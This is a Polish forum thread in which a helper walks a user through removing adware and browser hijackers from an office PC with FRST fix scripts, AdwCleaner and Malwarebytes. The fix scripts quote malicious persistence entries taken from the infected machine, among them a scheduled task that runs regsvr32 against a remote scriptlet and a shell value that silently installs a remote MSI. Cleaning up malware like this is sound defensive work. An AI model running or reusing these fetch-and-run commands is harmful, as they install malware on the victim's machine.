kalama23 Opublikowano 12 Maja 2017 Zgłoś Udostępnij Opublikowano 12 Maja 2017 (edytowane) Mam problem z wirusami, zainstalowały skróty na pulpicie i na pasku zadań, chrome zamyka się czasem samoczynnie, pojawił się drugi skrót do przeglądarki firefox.Wcześniej Pani obsługująca komputer radziła sobie adwcleanerem i kasperskym z tym że ten drugi zawieszał się w trakcie skanowania. Dziś stwierdziła że miała wrażenie przejęcia kontroli przez kogoś innego nad komputerem - zamykanie przeglądarki, instalacja programów jak pisałem już powyżej. Przy uruchomieniu FRST wyskakuje komunikat:" Exception EAccesViolation in module ERUNT.exe at 00003A3E.Acces violation at address 00403A3E in module 'ERUNT.exe'. Write of address 0076005D."po kliknięciu OK wykonałem skan. GMER - raport z safe mode, w normalnym trybie można było tylko zaznaczyć trzy ostatnie pola wyboru: usługi, rejestr i pliki oraz ADS, reszta pól była szara, nieaktywna. Komputer używany przez Panią księgową jest na nim dużo programów - formatowanie dysku chciałbym wykonać tylko w ostateczności ponieważ boję się o utratę danych.Bardzo proszę o pomoc oraz propozycję programu antywirusowego który mam kupić.Dotacja przekazana czy pominąłem jakiś skan? jeśli coś braknie proszę o informację.EDIT: Komputer jest potrzebny do pracy, nie chcę naciskać ale też czas coraz bardziej nagli...Czy jest szansa na pomoc?Czy można pracować na tym komputerze? Pani księgowa już się modli w intencji naprawy Addition.txt FRST.txt Shortcut.txt gmer.txt Edytowane 1 Czerwca 2017 przez kalama23 Łączę posty. Odnośnik do komentarza
Miszel03 Opublikowano 18 Maja 2017 Zgłoś Udostępnij Opublikowano 18 Maja 2017 Księgowej współczuje, bo wykonywanie tego zawodu bez komputera to faktycznie udręka. Przepraszam, nie mogłem szybciej. Nie powiem, że taki stan systemu to ja widzę niecodziennie, bo widzę nawet i kilka razy dziennie co prezentuje obraz sytuacji. Masa infekcji, prefabrykowane przeglądarki, adware zarażające skróty i wiele wiele więcej. Myślę, że uporamy się z tym szybko. Do poczytania, obowiązkowo: KLIK. To uchroni Cię przed kolejną wizytą w tym dziale 1. Otwórz Notatnik w nim wklej: CloseProcesses: CreateRestorePoint: HKU\S-1-5-21-4102225431-1871780152-3223173906-1000\...\ChromeHTML: -> C:\Program Files (x86)\Bagsarah\Application\chrome.exe (Google Inc.) CustomCLSID: HKU\S-1-5-21-4102225431-1871780152-3223173906-1000_Classes\CLSID\{1423F872-3F7F-4E57-B621-8B1A9D49B448}\InprocServer32 -> C:\Users\Kasia\AppData\Local\Google\Update\1.3.27.5\psuser_64.dll => Brak pliku CustomCLSID: HKU\S-1-5-21-4102225431-1871780152-3223173906-1000_Classes\CLSID\{59B55F04-DE14-4BB8-92FF-C4A22EF2E5F4}\InprocServer32 -> C:\Users\Kasia\AppData\Local\Google\Update\1.3.31.5\psuser_64.dll => Brak pliku CustomCLSID: HKU\S-1-5-21-4102225431-1871780152-3223173906-1000_Classes\CLSID\{5C8C2A98-6133-4EBA-BBCC-34D9EA01FC2E}\InprocServer32 -> C:\Users\Kasia\AppData\Local\Google\Update\1.3.28.1\psuser_64.dll => Brak pliku CustomCLSID: HKU\S-1-5-21-4102225431-1871780152-3223173906-1000_Classes\CLSID\{78550997-5DEF-4A8A-BAF9-D5774E87AC98}\InprocServer32 -> C:\Users\Kasia\AppData\Local\Google\Update\1.3.28.13\psuser_64.dll => Brak pliku CustomCLSID: HKU\S-1-5-21-4102225431-1871780152-3223173906-1000_Classes\CLSID\{793EE463-1304-471C-ADF1-68C2FFB01247}\InprocServer32 -> C:\Users\Kasia\AppData\Local\Google\Update\1.3.29.5\psuser_64.dll => Brak pliku CustomCLSID: HKU\S-1-5-21-4102225431-1871780152-3223173906-1000_Classes\CLSID\{8C46158B-D978-483C-A312-16EE5013BE04}\InprocServer32 -> C:\Users\Kasia\AppData\Local\Google\Update\1.3.33.3\psuser_64.dll => Brak pliku CustomCLSID: HKU\S-1-5-21-4102225431-1871780152-3223173906-1000_Classes\CLSID\{CB492AF1-2CEF-4E58-BE47-471C77D0C8BA}\InprocServer32 -> C:\Users\Kasia\AppData\Local\Google\Update\1.3.32.7\psuser_64.dll => Brak pliku CustomCLSID: HKU\S-1-5-21-4102225431-1871780152-3223173906-1000_Classes\CLSID\{CC182BE1-84CE-4A57-B85C-FD4BBDF78CB2}\InprocServer32 -> C:\Users\Kasia\AppData\Local\Google\Update\1.3.29.1\psuser_64.dll => Brak pliku CustomCLSID: HKU\S-1-5-21-4102225431-1871780152-3223173906-1000_Classes\CLSID\{D1EDC4F5-7F4D-4B12-906A-614ECF66DDAF}\InprocServer32 -> C:\Users\Kasia\AppData\Local\Google\Update\1.3.28.15\psuser_64.dll => Brak pliku Task: {0659A980-3244-4202-929B-52EA5684F95D} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lotusiloveyou.com/?data=zDlkMj8yNjRWMYYxMdVXMWk4MjYcRkVXFdhXRWMyN8F2OWQYRF== scrobj.dll Task: {EF0F48A4-5D77-4EF5-9E10-B0316862B2DE} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2017-05-09] () Task: {F435B3AD-8F34-47FC-8D19-7D1DC252A958} - System32\Tasks\{1F2A387E-0C8B-4A90-B544-ECB3A1B99015} => pcalua.exe -a C:\Users\Kasia\AppData\Local\Temp\jre-8u131-windows-au.exe -d C:\Windows\SysWOW64 -c /installmethod=jau FAMILYUPGRADE=1 RemoveDirectory: C:\Program Files (x86)\MIO WMI_ActiveScriptEventConsumer_DellCommandPowerManagerAlertEventConsumer: WMI_ActiveScriptEventConsumer_DellCommandPowerManagerPolicyChangeEventConsumer: FirewallRules: [{43588AFA-371E-4EB2-809A-A7D0D9562A88}] => (Allow) C:\Program Files (x86)\Bagsarah\Application\chrome.exe FirewallRules: [{1750B21B-9C19-4DF6-B240-40EEDD753E7C}] => (Allow) C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe FirewallRules: [{6654B80F-3A65-4B3C-BEF2-F6D9096F8763}] => (Allow) C:\Program Files (x86)\Firefox\Firefox.exe RemoveDirectory: C:\Program Files (x86)\Bagsarah RemoveDirectory: C:\Users\Kasia\AppData\Local\Bagsarah RemoveDirectory: C:\Users\Kasia\AppData\Roaming\Bagsarah RemoveDirectory: C:\Program Files (x86)\Firefox RemoveDirectory: C:\Users\Kasia\AppData\Local\Firefox RemoveDirectory: C:\Users\Kasia\AppData\Roaming\Firefox ShortcutWithArgument: C:\Users\Kasia\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_felcaaldnbdncclmgdcncolpebgiejap\Arkusze Google.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory=Default --app-id=felcaaldnbdncclmgdcncolpebgiejap ShortcutWithArgument: C:\Users\Kasia\AppData\Local\Bagsarah\User Data\Default\Web Applications\_crx_felcaaldnbdncclmgdcncolpebgiejap\Arkusze Google.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory=Default --app-id=felcaaldnbdncclmgdcncolpebgiejap ShortcutWithArgument: C:\Users\Kasia\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1494320924&z=cb2aba3176602e7e4502859g3zbt9z6cdo8e1tdgam&from=che0812&uid=TS256GSSD370S_C162661064 ShortcutWithArgument: C:\Users\Kasia\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Microsoft WSE 3.0\WSE on the Web.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1494320924&z=cb2aba3176602e7e4502859g3zbt9z6cdo8e1tdgam&from=che0812&uid=TS256GSSD370S_C162661064 ShortcutWithArgument: C:\Users\Kasia\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Internet Explorer (No Add-ons).lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1494320924&z=cb2aba3176602e7e4502859g3zbt9z6cdo8e1tdgam&from=che0812&uid=TS256GSSD370S_C162661064 ShortcutWithArgument: C:\Users\Kasia\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Arkusze Google.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory=Default --app-id=felcaaldnbdncclmgdcncolpebgiejap ShortcutWithArgument: C:\Users\Kasia\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1494320924&z=cb2aba3176602e7e4502859g3zbt9z6cdo8e1tdgam&from=che0812&uid=TS256GSSD370S_C162661064 ShortcutWithArgument: C:\Users\Kasia\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\BigFarm.lnk -> C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (Microsoft Corporation) -> -Command "& {Start-Process -FilePath hxxp://bigfarm.goodgamestudios.com/?w=239064}"; ShortcutWithArgument: C:\Users\Kasia\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\big_bang_empire.lnk -> C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (Microsoft Corporation) -> -Command "& {Start-Process -FilePath hxxp://www.bigbangempire.com/?ref=281-000-000-005}"; ShortcutWithArgument: C:\Users\Kasia\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\BigFarm.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://bigfarm.goodgamestudios.com/?w=239064 ShortcutWithArgument: C:\Users\Kasia\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\big_bang_empire.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://www.bigbangempire.com/?ref=281-000-000-005 C:\Users\Kasia\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk C:\Users\Kasia\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk C:\Users\Kasia\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Google Chrome.lnk C:\Users\Kasia\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\5d696d521de238c3\Google Chrome.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk Winlogon\Notify\ScCertProp: wlnotify.dll [X] HKU\S-1-5-21-4102225431-1871780152-3223173906-1000\...\Run: [GoogleChromeAutoLaunch_2ADBC5D4CA6B0A1DE744757424E6F2ED] => "C:\Program Files (x86)\Everness\Application\chrome.exe" --no-startup-window /prefetch:5 HKU\S-1-5-21-4102225431-1871780152-3223173906-1000\...\Run: [background_fault] => C:\Users\Kasia\AppData\Local\background_fault\aswRD.exe [1419576 2017-05-09] (AVAST Software) HKU\S-1-5-21-4102225431-1871780152-3223173906-1000\...\Policies\system: [shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj8yNjRWMYYxMdVXMWk4MjYcRkVXFdhXRWMyN8F2OWQYRF== /q RemoveDirectory: C:\Program Files (x86)\Everness RemoveDirectory: C:\Users\Kasia\AppData\Local\Everness RemoveDirectory: C:\Users\Kasia\AppData\Roaming\Everness C:\Users\Kasia\AppData\Local\background_fault\aswRD.exe HKU\S-1-5-21-4102225431-1871780152-3223173906-1000\...\Policies\Explorer: [NoLowDiskSpaceChecks] 1 IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Ograniczenia HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1494320924&z=cb2aba3176602e7e4502859g3zbt9z6cdo8e1tdgam&from=che0812&uid=TS256GSSD370S_C162661064 HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1494320924&z=cb2aba3176602e7e4502859g3zbt9z6cdo8e1tdgam&from=che0812&uid=TS256GSSD370S_C162661064 HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.istartsurf.com/web/?type=ds&ts=1434916331&z=1812db3e52683682890b67bg3z9caz8tag0qecco5q&from=cor&uid=TS256GSSD370S_C162661064&q={searchTerms} HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.istartsurf.com/web/?type=ds&ts=1434916331&z=1812db3e52683682890b67bg3z9caz8tag0qecco5q&from=cor&uid=TS256GSSD370S_C162661064&q={searchTerms} HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1494320924&z=cb2aba3176602e7e4502859g3zbt9z6cdo8e1tdgam&from=che0812&uid=TS256GSSD370S_C162661064 HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1494320924&z=cb2aba3176602e7e4502859g3zbt9z6cdo8e1tdgam&from=che0812&uid=TS256GSSD370S_C162661064 HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.istartsurf.com/web/?type=ds&ts=1434916331&z=1812db3e52683682890b67bg3z9caz8tag0qecco5q&from=cor&uid=TS256GSSD370S_C162661064&q={searchTerms} HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.istartsurf.com/web/?type=ds&ts=1434916331&z=1812db3e52683682890b67bg3z9caz8tag0qecco5q&from=cor&uid=TS256GSSD370S_C162661064&q={searchTerms} HKU\S-1-5-21-4102225431-1871780152-3223173906-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.istartsurf.com/web/?type=dspp&ts=1434916399&z=72c6d913177a99cde3b5acagaz6c6zat8gfq2c4t1z&from=cor&uid=TS256GSSD370S_C162661064&q={searchTerms} SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKU\S-1-5-21-4102225431-1871780152-3223173906-1000 -> {1ACDEAF4-49DC-4E40-AA61-C4AF9D052B43} URL = StartMenuInternet: IEXPLORE.EXE - C:\Program Files (x86)\Internet Explorer\iexplore.exe hxxp://www.ourluckysites.com/?type=sc&ts=1494320924&z=cb2aba3176602e7e4502859g3zbt9z6cdo8e1tdgam&from=che0812&uid=TS256GSSD370S_C162661064 StartMenuInternet: Google Chrome - C:\Program Files (x86)\Google\Chrome\Application\chrome.exe hxxp://www.ourluckysites.com/?type=sc&ts=1494320924&z=cb2aba3176602e7e4502859g3zbt9z6cdo8e1tdgam&from=che0812&uid=TS256GSSD370S_C162661064 R2 ANSARE; C:\Users\Kasia\AppData\Local\ANSARE\Snare.dll [826368 2017-05-08] (InterSect Alliance Pty Ltd) [brak podpisu cyfrowego] R2 BIT; C:\ProgramData\BIT\BIT.dll [1857536 2017-05-09] (BIT.dll) [brak podpisu cyfrowego] R2 FirefoxU; C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe [97280 2017-05-11] () [brak podpisu cyfrowego] S2 NPASRE; C:\Users\Kasia\AppData\Local\NPASRE\Snare.dll [830464 2017-05-10] (InterSect Alliance Pty Ltd) [brak podpisu cyfrowego] R2 OneDirveSrv; C:\ProgramData\Microsoft OneDrive\setup\SyncTool.dll [129024 2017-05-10] () [brak podpisu cyfrowego] R2 VNASRE; C:\Users\Kasia\AppData\Local\VNASRE\Snare.dll [826368 2017-05-09] (InterSect Alliance Pty Ltd) [brak podpisu cyfrowego] R2 WinSAPSvc; C:\Users\Kasia\AppData\Roaming\WinSAPSvc\WinSAP.dll [585216 2017-05-09] (serviec) [brak podpisu cyfrowego] U3 pgddapod; \??\C:\Users\Kasia\AppData\Local\Temp\pgddapod.sys [X] C:\Users\Kasia\AppData\Local\ANSARE C:\ProgramData\BIT C:\Users\Kasia\AppData\Local\NPASRE C:\ProgramData\Microsoft OneDrive\setup\SyncTool.dll C:\Users\Kasia\AppData\Local\VNASRE C:\Users\Kasia\AppData\Roaming\WinSAPSvc C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk C:\Users\Kasia\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk C:\Users\Kasia\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Firefox.lnk C:\Users\Kasia\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Mozilla Firefox.lnk C:\Users\Public\Desktop\Mozilla Firefox.lnk C:\Users\Kasia\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\firefox — skrót.lnk EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Wyczyść i zabezpiecz przeglądarkę Google Chrome: Zresetuj synchronizację (o ile włączona): KLIK. Ustawienia > karta Rozszerzenia > odinstaluj wszystkie nieznane i niepotrzebne Ci rozszerzenia. Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Resetowanie ustawień. Zakładki i hasła nie zostaną naruszone. Ustawienia > karta Ustawienia > sekcja Szukaj > klik w Zarządzanie wyszukiwarkami > skasuj z listy wszystko z wyjątkiem Google. Zainstaluj rozszerzenie blokujące reklamy o podłożu nieinfekcyjnym, polecam rozszerzenie uBlock Origin Ustaw jakąkolwiek zaufaną przeglądarkę jako domyślną, najlepiej Google Chrome. To wymagany krok to kasacji modyfikacji infekcji. 3. Wyczyść i zabezpiecz przeglądarkę Mozilla FireFox: Odłącz synchronizację (o ile włączona): KLIK. Menu Pomoc > Informacje dla pomocy technicznej > Odśwież program Firefox. Zakładki i hasła nie zostaną naruszone. Menu Historia > Wyczyść historię przeglądania. Zainstaluj rozszerzenie blokujące reklamy o podłożu nieinfekcyjnym, polecam rozszerzenie uBlock Origin. 4. Uruchom FRST, w polu Szukaj (Search) wklej poniższą frazę i kliknij w Szukaj w rejestrze (Search Registry). bagsarah;everness;firefox Obok FRST powstanie raport SearchReg.txt - zaprezentuj go na forum. 5. Pobierz AdwCleaner uruchom go i kliknij Skanuj, a gdy uaktywni się przycisk Oczyść kliknij go. Dostarcz raport z tego działania. 6. Zrób nowy log FRST z opcji Skanuj (Scan), wraz z Addition i Shortcut. Dołącz też plik fixlog.txt. Odnośnik do komentarza
kalama23 Opublikowano 18 Maja 2017 Autor Zgłoś Udostępnij Opublikowano 18 Maja 2017 Dziękuję bardzo za pochylenie się nad moim kłopotem. FRST przestał działać w pewnym momencie, po ponownym uruchomieniu program poinformował o log-u i braku restartu: Kolejne uruchomienie i log2. Fixlog.txt Fixlog2.txt Odnośnik do komentarza
Miszel03 Opublikowano 18 Maja 2017 Zgłoś Udostępnij Opublikowano 18 Maja 2017 (edytowane) Wygląda, że się wykonano. Poproszę o dalsze raporty. Edytowane 18 Maja 2017 przez Rucek Odnośnik do komentarza
kalama23 Opublikowano 18 Maja 2017 Autor Zgłoś Udostępnij Opublikowano 18 Maja 2017 (edytowane) Fixlog w dwóch podejściach jak pisałem powyżej. AdwCleanerC3.txt SearchReg.txt FRST.txt Addition.txt Shortcut.txt Fixlog1.txt Fixlog2.txt Edytowane 19 Maja 2017 przez Rucek Odnośnik do komentarza
Miszel03 Opublikowano 19 Maja 2017 Zgłoś Udostępnij Opublikowano 19 Maja 2017 Jest dużo lepiej, wdrążam poprawki oraz kompelksowy skan przeciwwirusowy. Myślę, że zbliżamy się do końca. 1. Otwórz Notatnik w nim wklej: CloseProcesses: CreateRestorePoint: DeleteKey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Bagsarah DeleteKey: HKEY_USERS\S-1-5-21-4102225431-1871780152-3223173906-1000\Software\Bagsarah DeleteKey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Everness DeleteKey: HKEY_USERS\S-1-5-21-4102225431-1871780152-3223173906-1000\Software\Everness CustomCLSID: HKU\S-1-5-21-4102225431-1871780152-3223173906-1000_Classes\CLSID\{590C4387-5EBD-4D46-8A84-CD0BA2EF2856}\InprocServer32 -> C:\Users\Kasia\AppData\Local\Google\Update\1.3.30.3\psuser_64.dll => Brak pliku 2017-05-12 11:37 - 2017-05-12 12:29 - 00000000 _____ C:\Windows\SysWOW64\1111 2017-05-12 11:37 - 2017-05-12 11:37 - 00000000 _____ C:\Windows\SysWOW64\3333333 2017-05-12 11:37 - 2017-05-12 11:37 - 00000000 _____ C:\Windows\SysWOW64\33 2017-05-12 11:37 - 2017-05-12 11:37 - 00000000 _____ C:\Windows\SysWOW64\1111111 2017-05-12 11:37 - 2017-05-12 11:37 - 00000000 _____ C:\Windows\SysWOW64\00 2017-04-27 14:22 - 2017-05-02 21:22 - 00000000 ____D C:\Program Files (x86)\BiaoJi SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Całościowo przeskanuj system za pomocą Malwarebytes AntiMalware. Jeśli coś wykryje to niczego nie usuwaj, a dostarcz raport. 3. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition i Shortcut Dołącz też plik fixlog.txt. Podsumuj również obecny stan systemu. Odnośnik do komentarza
kalama23 Opublikowano 19 Maja 2017 Autor Zgłoś Udostępnij Opublikowano 19 Maja 2017 Działanie FRST jest przerywane: Dell Foundation Services - usługa przestała działać i komputer musi być uruchomiony ponownie, po czym następuje restart komputera. Odnośnik do komentarza
Miszel03 Opublikowano 19 Maja 2017 Zgłoś Udostępnij Opublikowano 19 Maja 2017 Spróbuj z poziomu Trybu Awaryjnego (klawisz F8 przed startem systemu). Odnośnik do komentarza
kalama23 Opublikowano 19 Maja 2017 Autor Zgłoś Udostępnij Opublikowano 19 Maja 2017 Na pasku zadań pozostały białe skróty - chrome i big_bang_empire. Menu start również są białe - firefox, chrome, big_bang_empire i BigFarm. Raporty: Fixlog.txt Shortcut.txt Addition.txt mbam.txt Odnośnik do komentarza
Miszel03 Opublikowano 22 Maja 2017 Zgłoś Udostępnij Opublikowano 22 Maja 2017 A gdzie raport FRST.txt? Odnośnik do komentarza
kalama23 Opublikowano 12 Czerwca 2017 Autor Zgłoś Udostępnij Opublikowano 12 Czerwca 2017 (edytowane) Przepraszam, przeoczyłem. EDIT 1: Panie Miszelu czy będziemy jeszcze działać czy to już koniec? Bardzo proszę o polecenie oprogramowania zabezpieczającego - lada dzień skończy mi się okres testowy i będę musiał podjąć decyzję. Zależałoby mi na tym żeby był to wybór poparty wiedzą a nie reklamą więc jestem otwarty na sugestie. EDIT 2: Nieśmiało przypominam o zakończeniu leczenia. Z góry bardzo dziękuję za zainteresowanie. FRST.txt Edytowane 14 Czerwca 2017 przez Rucek Odnośnik do komentarza
Miszel03 Opublikowano 12 Czerwca 2017 Zgłoś Udostępnij Opublikowano 12 Czerwca 2017 Bardzo proszę o polecenie oprogramowania zabezpieczającego - lada dzień skończy mi się okres testowy i będę musiał podjąć decyzję. Zależałoby mi na tym żeby był to wybór poparty wiedzą a nie reklamą więc jestem otwarty na sugestie. Na Twoim miejscu zostałbym na pokładzie z darmową wersją Avast. Ewentualnie do tego możesz dołożyć jakiś skaner na żądanie np. MBAM / KVRT / HitmanPro. 1. Zagrożenia wykryte przez Malwarebytes daj do usunięcia. 2. Skasuj poniższe skróty ręcznie: C:\Users\Kasia\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\big_bang_empire.lnk C:\Users\Kasia\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\BigFarm.lnk C:\Users\Kasia\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\big_bang_empire.lnk 3. Podsumuj obecny stan systemu. Odnośnik do komentarza
kalama23 Opublikowano 13 Czerwca 2017 Autor Zgłoś Udostępnij Opublikowano 13 Czerwca 2017 Komputer działa bezproblemowo. Bardzo dziękuję za pomoc. Odnośnik do komentarza
Miszel03 Opublikowano 13 Czerwca 2017 Zgłoś Udostępnij Opublikowano 13 Czerwca 2017 W takim razie kończymy. Zastosuj DelFix (kasacja używanych narzędzi) oraz zaktualizuj oprogramowanie zewnętrzne oraz Windows. Odnośnik do komentarza
Rekomendowane odpowiedzi
Jeśli chcesz dodać odpowiedź, zaloguj się lub zarejestruj nowe konto
Jedynie zarejestrowani użytkownicy mogą komentować zawartość tej strony.
Zarejestruj nowe konto
Załóż nowe konto. To bardzo proste!
Zarejestruj sięZaloguj się
Posiadasz już konto? Zaloguj się poniżej.
Zaloguj się